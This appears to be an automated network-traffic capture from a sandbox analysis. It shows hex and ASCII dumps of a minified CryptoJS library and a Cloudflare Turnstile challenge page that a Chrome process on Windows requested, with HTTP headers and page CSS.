                                                                                                                                                2024-10-28 16:49:17 UTC415INData Raw: 37 62 66 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                Data Ascii: 7bf7!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c
                                                                                                                                                Data Ascii: balThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b
                                                                                                                                                Data Ascii: this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f
                                                                                                                                                Data Ascii: t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30
                                                                                                                                                Data Ascii: =this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31
                                                                                                                                                Data Ascii: =0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>1
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69
                                                                                                                                                Data Ascii: yteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:functi
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55
                                                                                                                                                Data Ascii: (64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTU
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61
                                                                                                                                                Data Ascii: (t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._ha
                                                                                                                                                2024-10-28 16:49:17 UTC1369INData Raw: 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29
                                                                                                                                                Data Ascii: (m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50])


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                61192.168.2.1649797104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:17 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                Referer: https://8sq.w2agn.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:18 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:18 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Content-Length: 26446
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                document-policy: js-profiling
                                                                                                                                                2024-10-28 16:49:18 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 39 63 36 62 31 37 61 65 39 32 33 61 61 66 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8d9c6b17ae923aaf-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:18 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                                                                                                Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                                                                                                Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f
                                                                                                                                                Data Ascii: nge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-o
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e
                                                                                                                                                Data Ascii: .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-lin
                                                                                                                                                2024-10-28 16:49:18 UTC1369INData Raw: 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 66
                                                                                                                                                Data Ascii: fset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#f
